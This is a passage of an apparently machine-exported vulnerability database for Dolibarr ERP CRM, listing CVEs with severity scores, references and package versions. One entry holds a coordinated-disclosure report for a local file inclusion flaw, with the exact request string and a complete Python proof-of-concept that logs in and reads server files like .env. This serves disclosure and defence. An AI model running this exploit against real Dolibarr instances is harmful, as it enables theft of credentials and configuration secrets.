published_at 2026-06-04T12:55:00Z
1
value 0.51559
scoring_system epss
scoring_elements 0.97948
published_at 2026-06-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-40871
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/youncyb/dolibarr-rce
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-05-15T15:00:17Z/
url https://github.com/youncyb/dolibarr-rce
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-40871
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-40871
4
reference_url https://github.com/advisories/GHSA-7cm4-vmf2-8wf2
reference_id GHSA-7cm4-vmf2-8wf2
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7cm4-vmf2-8wf2
fixed_packages
aliases CVE-2022-40871, GHSA-7cm4-vmf2-8wf2
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tmv2-39y8-f7f1
24
url VCID-tsbf-m4eq-gbgp
vulnerability_id VCID-tsbf-m4eq-gbgp
summary 
Dolibarr ERP CRM Code Injection vulnerability during installation
Lack of sanitization during Installation Process in Dolibarr ERP CRM up to version 19.0.0 allows an attacker with adjacent access to the network to execute arbitrary code via a specifically crafted input.
references
0
reference_url http://dolibarr.com
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/
url http://dolibarr.com
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-29477
reference_id
reference_type
scores
0
value 0.00165
scoring_system epss
scoring_elements 0.37268
published_at 2026-06-07T12:55:00Z
1
value 0.00165
scoring_system epss
scoring_elements 0.37294
published_at 2026-06-05T12:55:00Z
2
value 0.00165
scoring_system epss
scoring_elements 0.373
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-29477
2
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-29477
reference_id CVE-2024-29477
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-29477
4
reference_url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md
reference_id CVE-2024-29477.MD
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-04-03T14:57:17Z/
url https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-29477.md
5
reference_url https://github.com/advisories/GHSA-p73x-rpgm-3v56
reference_id GHSA-p73x-rpgm-3v56
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p73x-rpgm-3v56
fixed_packages
aliases CVE-2024-29477, GHSA-p73x-rpgm-3v56
risk_score 4.0
exploitability 0.5
weighted_severity 7.9
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tsbf-m4eq-gbgp
25
url VCID-v9g8-u2uq-7yff
vulnerability_id VCID-v9g8-u2uq-7yff
summary 
Improper Authorization in dolibarr/dolibarr
An Improper Authorization vulnerability exists in Dolibarr versions prior to version 15.0.0. A user with restricted permissions in the 'Reception' section is able to access specific reception details via direct URL access, bypassing the intended permission restrictions.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-3991
reference_id
reference_type
scores
0
value 0.00051
scoring_system epss
scoring_elements 0.16414
published_at 2026-06-07T12:55:00Z
1
value 0.00051
scoring_system epss
scoring_elements 0.16377
published_at 2026-06-04T12:55:00Z
2
value 0.00051
scoring_system epss
scoring_elements 0.16458
published_at 2026-06-05T12:55:00Z
3
value 0.00051
scoring_system epss
scoring_elements 0.16457
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-3991
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
1
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/
url https://github.com/dolibarr/dolibarr/commit/63cd06394f39d60784d6e6a0ccf4867a71a6568f
3
reference_url https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
1
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T18:23:55Z/
url https://huntr.com/bounties/58ddbd8a-0faf-4b3f-aec9-5850bb19ab67
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-3991
reference_id CVE-2021-3991
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-3991
5
reference_url https://github.com/advisories/GHSA-wppr-j57c-8jpm
reference_id GHSA-wppr-j57c-8jpm
reference_type
scores
url https://github.com/advisories/GHSA-wppr-j57c-8jpm
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@15.0.0
purl pkg:composer/dolibarr/dolibarr@15.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1225-a2a6-bkan
1
vulnerability VCID-1uje-n8xc-y7b7
2
vulnerability VCID-3xdg-az5a-dyft
3
vulnerability VCID-4c2v-phxx-y3h8
4
vulnerability VCID-6drz-jsq4-wyhd
5
vulnerability VCID-7ku4-fwqc-33ba
6
vulnerability VCID-7qjh-teat-tqav
7
vulnerability VCID-8fjr-6hdm-vqdd
8
vulnerability VCID-d4uk-4adf-mba9
9
vulnerability VCID-egxz-r3nw-xffm
10
vulnerability VCID-ewrf-wdsh-kqgs
11
vulnerability VCID-f122-u34a-kfcm
12
vulnerability VCID-htgn-37m4-c7fu
13
vulnerability VCID-j345-dk2c-yfds
14
vulnerability VCID-jbkd-su9m-3udy
15
vulnerability VCID-k9nc-tze6-k7bx
16
vulnerability VCID-mpmz-eh21-nkcm
17
vulnerability VCID-pfyf-s4fc-d3a8
18
vulnerability VCID-rqux-jkta-4kfj
19
vulnerability VCID-s3xn-47cy-eucf
20
vulnerability VCID-srth-2stq-gyaq
21
vulnerability VCID-tmv2-39y8-f7f1
22
vulnerability VCID-tsbf-m4eq-gbgp
23
vulnerability VCID-vp4z-qpc7-uug1
24
vulnerability VCID-vwxd-syyk-jueh
25
vulnerability VCID-w7ww-nq62-e7b1
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0
aliases CVE-2021-3991, GHSA-wppr-j57c-8jpm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-v9g8-u2uq-7yff
26
url VCID-vp4z-qpc7-uug1
vulnerability_id VCID-vp4z-qpc7-uug1
summary 
Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php
# Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure

## Target

Dolibarr Core (Tested on version 22.0.4)

## Summary

A Local File Inclusion (LFI) vulnerability has been discovered in the core AJAX endpoint `/core/ajax/selectobject.php`. By manipulating the `objectdesc` parameter and exploiting a fail-open logic flaw in the core access control function `restrictedArea()`, an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as `.env`, `.htaccess`, configuration backups, or logs…).

## Vulnerability Details

The vulnerability is caused by a critical design flaw in `/core/ajax/selectobject.php` where dynamic file inclusion occurs **before** any access control checks are performed, combined with a fail-open logic in the core ACL function.

- **Arbitrary File Inclusion BEFORE Authorization:** The endpoint parses the `objectdesc` parameter into a `$classpath`. If `fetchObjectByElement` fails (e.g., by providing a fake class like `A:conf/.htaccess:0`), the application falls back to `dol_include_once($classpath)` at **line 71**. At this point, the arbitrary file is included and its content is dumped into the HTTP response buffer. This happens *before* the application checks any user permissions.
- **Access Control Bypass (Fail-Open):** At **line 102**, the application finally attempts to verify permissions by calling `restrictedArea()`. Because the object creation failed, the `$features` parameter sent to `restrictedArea()` is empty (`''`). Inside `security.lib.php`, if the `$features` parameter is empty, the access check block is completely skipped, leaving the `$readok` variable at `1`. Because of this secondary flaw, the script finishes cleanly with an HTTP 200 OK instead of throwing a 403 error.

This allows any authenticated user to bypass ACLs and include files. While PHP files cause a fatal error before their code is displayed, the contents of any text-based file (like `.htaccess`, `.env`, `.json`, `.sql`) are dumped into the HTTP response before the application crashes.

## Steps to Reproduce

- Log in to the Dolibarr instance with any user account (no specific permissions required).
- Intercept or manually forge a GET request to the following endpoint:

```
GET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0
```

- Observe the HTTP response. The contents of the `conf/.htaccess` file will be reflected in the response body right before the PHP Fatal Error message.
- *(Optional)* Run the attached Python PoC to automate the extraction:

```
python3 poc.py --url http://target.com --username '<username>' --password '<password>' --file conf/.htaccess
```

## Impact

An attacker with minimal access to the CRM can exfiltrate sensitive files from the server. This can lead to the disclosure of environment variables (`.env`), infrastructure configurations (`.htaccess`), installed packages versions, or even forgotten logs and database dumps, paving the way for further attacks.

## Suggested Mitigation

- **Input Validation & Whitelisting:** The `$classpath` must be strictly validated or whitelisted before being passed to `dol_include_once()`.
- **Execution Flow Correction:** The file inclusion logic must never be executed before the user's authorization has been fully verified.
- **Enforce Fail-Secure ACLs:** Modify `restrictedArea()` in `core/lib/security.lib.php` so that if the `$features` parameter is empty, access is explicitly denied (`$readok = 0`) instead of allowed by default.

## Disclosure Policy & Assistance

The reporter is committed to coordinated vulnerability disclosure. This vulnerability, along with the provided PoC, will be kept strictly confidential until a patch is released and explicit authorization for public disclosure is given.

Should any further technical details, logs, or testing of the remediation once a patch has been developed be needed, the reporter is available to assist.

Thank you for the time and commitment to securing Dolibarr.

Best Regards,
Vincent KHAYAT (cnf409)

## Video PoC

https://github.com/user-attachments/assets/4af80050-4329-4c88-8a54-e2b522deb844

## PoC Script

```python
#!/usr/bin/env python3
"""Dolibarr selectobject.php authenticated LFI PoC"""

import argparse
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

LOGIN_MARKERS = ("Login @", "Identifiant @")
LOGOUT_MARKERS = ("/user/logout.php", "Logout", "Mon tableau de bord")

def request(
    opener, base_url, method, path, params=None, data=None, timeout=15
):
    url = f"{base_url.rstrip('/')}{path}"
    if params:
        url = f"{url}?{urllib.parse.urlencode(params)}"
    payload = urllib.parse.urlencode(data).encode("utf-8") if data else None
    req = urllib.request.Request(url, method=method.upper(), data=payload)
    req.add_header("User-Agent", "dolibarr-lfi-poc/1.0-securitytest-for-dolibarr")
    req.add_header("Accept", "text/html,application/xhtml+xml")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", errors="replace")

def extract_login_token(page):
    for pattern in (
        r'name=["\']token["\']\s+value=["\']([^"\']*)["\']',
        r'name=["\']anti-csrf-newtoken["\']\s+content=["\']([^"\']*)["\']',
    ):
        match = re.search(pattern, page, flags=re.IGNORECASE)
        if match:
            return match.group(1)
    return ""

def looks_authenticated(body):
    return any(marker in body for marker in LOGOUT_MARKERS)

def clean_included_output(body):
    for marker in (
        "<br />\n<b>Warning",
        "<br />\r\n<b>Warning",
        "<br />\n<b>Fatal error",
        "<br />\r\n<b>Fatal error",
    ):
        pos = body.find(marker)
        if pos != -1:
            return body[:pos].rstrip()
    return body.rstrip()

def login(opener, base_url, username, password):
    code, login_page = request(opener, base_url, "GET", "/")
    if code >= 400:
        return False, f"HTTP {code} on login page"
    token = extract_login_token(login_page)
    code, after_login = request(
        opener,
        base_url,
        "POST",
        "/index.php?mainmenu=home",
        data={
            "token": token,
            "actionlogin": "login",
            "loginfunction": "loginfunction",
            "username": username,
            "password": password,
        },
    )
    if code >= 400:
        return False, f"HTTP {code} on login request"
    if looks_authenticated(after_login):
        return True, ""
    code, home = request(opener, base_url, "GET", "/index.php?mainmenu=home")
    if code < 400 and looks_authenticated(home):
        return True, ""
    return False, "Invalid username or password"

def read_file(opener, base_url, relative_path):
    status, body = request(
        opener,
        base_url,
        "GET",
        "/core/ajax/selectobject.php",
        params={
            "outjson": "0",
            "htmlname": "x",
            "objectdesc": f"A:{relative_path}:0",
        },
    )
    if any(marker in body for marker in LOGIN_MARKERS) and not looks_authenticated(body):
        raise RuntimeError("Session expired or not authenticated")
    return status, body, clean_included_output(body)

def parse_args():
    parser = argparse.ArgumentParser(
        description="Authenticated LFI PoC against /core/ajax/selectobject.php (Dolibarr 22.0.4)."
    )
    parser.add_argument(
        "--url",
        default="http://127.0.0.1:8080",
        help="Dolibarr base URL (default: http://127.0.0.1:8080)",
    )
    parser.add_argument("--username", required=True, help="Dolibarr username")
    parser.add_argument("--password", required=True, help="Dolibarr password")
    parser.add_argument(
        "--file",
        dest="target_file",
        required=True,
        help="Target file to read (e.g. conf/.htaccess).",
    )
    return parser.parse_args()

def print_result(path, status, raw, clean):
    print(f"\n[+] HTTP status: {status}")
    print(f"[+] Requested file: {path}")
    print("=" * 80)
    if clean:
        print(html.unescape(clean))
    else:
        print("(No readable output extracted)")
    print("=" * 80)
    if clean != raw.rstrip():
        print("[i] PHP warnings/fatal output were trimmed from display.")

def summarize_error_body(body, limit=1200):
    text = html.unescape(body).strip()
    if not text:
        return "(Empty response body)"
    if len(text) > limit:
        return text[:limit].rstrip() + "\n... [truncated]"
    return text

def main():
    args = parse_args()
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar())
    )
    ok, reason = login(opener, args.url, args.username, args.password)
    if not ok:
        print(f"[!] {reason}")
        return 1
    print("[+] Login successful.")
    try:
        status, raw, clean = read_file(opener, args.url, args.target_file)
        if status >= 400:
            print(f"[!] HTTP {status} while reading target file.")
            print("=" * 80)
            print(summarize_error_body(raw))
            print("=" * 80)
            return 1
        print_result(args.target_file, status, raw, clean)
        return 0
    except Exception as exc:
        print(f"[!] Error: {exc}")
        return 1

if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except KeyboardInterrupt:
        print("\nInterrupted.")
        raise SystemExit(130)
```
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-34036
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.03136
published_at 2026-06-05T12:55:00Z
1
value 0.00015
scoring_system epss
scoring_elements 0.03146
published_at 2026-06-06T12:55:00Z
2
value 0.00017
scoring_system epss
scoring_elements 0.04423
published_at 2026-06-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-34036
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:14Z/
url https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a
3
reference_url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:14Z/
url https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-34036
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-34036
5
reference_url https://github.com/advisories/GHSA-2mfj-r695-5h9r
reference_id GHSA-2mfj-r695-5h9r
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-2mfj-r695-5h9r
fixed_packages
aliases CVE-2026-34036, GHSA-2mfj-r695-5h9r
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vp4z-qpc7-uug1
27
url VCID-vwxd-syyk-jueh
vulnerability_id VCID-vwxd-syyk-jueh
summary 
Dolibarr Improper Input Validation vulnerability
Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-4197
reference_id
reference_type
scores
0
value 0.53316
scoring_system epss
scoring_elements 0.98032
published_at 2026-06-07T12:55:00Z
1
value 0.53316
scoring_system epss
scoring_elements 0.98031
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-4197
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/Dolibarr/dolibarr/commit/0ed6a63fb06be88be5a4f8bcdee83185eee4087e
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-05T19:57:10Z/
url https://github.com/Dolibarr/dolibarr/commit/0ed6a63fb06be88be5a4f8bcdee83185eee4087e
3
reference_url https://starlabs.sg/advisories/23/23-4197
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-05T19:57:10Z/
url https://starlabs.sg/advisories/23/23-4197
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-4197
reference_id CVE-2023-4197
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-4197
5
reference_url https://github.com/advisories/GHSA-r9cm-pw9j-3fpx
reference_id GHSA-r9cm-pw9j-3fpx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r9cm-pw9j-3fpx
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@18.0.2
purl pkg:composer/dolibarr/dolibarr@18.0.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.2
aliases CVE-2023-4197, GHSA-r9cm-pw9j-3fpx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vwxd-syyk-jueh
28
url VCID-w7ww-nq62-e7b1
vulnerability_id VCID-w7ww-nq62-e7b1
summary 
Dolibarr ERP CRM vulnerable to remote code execution (RCE)
Dolibarr ERP CRM before 19.0.2 was discovered to contain a remote code execution (RCE) vulnerability via the Computed field parameter under the Users Module Setup function.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-40137
reference_id
reference_type
scores
0
value 0.0048
scoring_system epss
scoring_elements 0.65465
published_at 2026-06-07T12:55:00Z
1
value 0.0048
scoring_system epss
scoring_elements 0.65477
published_at 2026-06-06T12:55:00Z
2
value 0.0048
scoring_system epss
scoring_elements 0.65466
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-40137
1
reference_url https://github.com/Dolibarr/dolibarr
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N
1
value 7.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/Dolibarr/dolibarr
2
reference_url https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137
reference_id CVE-2024-40137
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N
1
value 7.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-25T16:09:38Z/
url https://github.com/c0d3x27/CVEs/tree/main/CVE-2024-40137
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-40137
reference_id CVE-2024-40137
reference_type
scores
0
value 5.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N
1
value 7.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-40137
4
reference_url https://github.com/advisories/GHSA-vprp-94p9-5jp8
reference_id GHSA-vprp-94p9-5jp8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vprp-94p9-5jp8
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@19.0.2
purl pkg:composer/dolibarr/dolibarr@19.0.2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2
aliases CVE-2024-40137, GHSA-vprp-94p9-5jp8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-w7ww-nq62-e7b1
29
url VCID-z1ty-xypd-t3ct
vulnerability_id VCID-z1ty-xypd-t3ct
summary 
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
dolibarr is vulnerable to Improper Neutralization of Special Elements used in an SQL Command
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-0224
reference_id
reference_type
scores
0
value 0.00515
scoring_system epss
scoring_elements 0.67021
published_at 2026-06-06T12:55:00Z
1
value 0.00515
scoring_system epss
scoring_elements 0.67005
published_at 2026-06-07T12:55:00Z
2
value 0.00515
scoring_system epss
scoring_elements 0.66972
published_at 2026-06-04T12:55:00Z
3
value 0.00515
scoring_system epss
scoring_elements 0.67012
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-0224
1
reference_url https://github.com/dolibarr/dolibarr
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr
2
reference_url https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79
3
reference_url https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-0224
reference_id CVE-2022-0224
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-0224
5
reference_url https://github.com/advisories/GHSA-j545-frh3-r9gq
reference_id GHSA-j545-frh3-r9gq
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j545-frh3-r9gq
fixed_packages
0
url pkg:composer/dolibarr/dolibarr@15.0.0
purl pkg:composer/dolibarr/dolibarr@15.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1225-a2a6-bkan
1
vulnerability VCID-1uje-n8xc-y7b7
2
vulnerability VCID-3xdg-az5a-dyft
3
vulnerability VCID-4c2v-phxx-y3h8
4
vulnerability VCID-6drz-jsq4-wyhd
5
vulnerability VCID-7ku4-fwqc-33ba
6
vulnerability VCID-7qjh-teat-tqav
7
vulnerability VCID-8fjr-6hdm-vqdd
8
vulnerability VCID-d4uk-4adf-mba9
9
vulnerability VCID-egxz-r3nw-xffm
10
vulnerability VCID-ewrf-wdsh-kqgs
11
vulnerability VCID-f122-u34a-kfcm
12
vulnerability VCID-htgn-37m4-c7fu
13
vulnerability VCID-j345-dk2c-yfds
14
vulnerability VCID-jbkd-su9m-3udy
15
vulnerability VCID-k9nc-tze6-k7bx
16
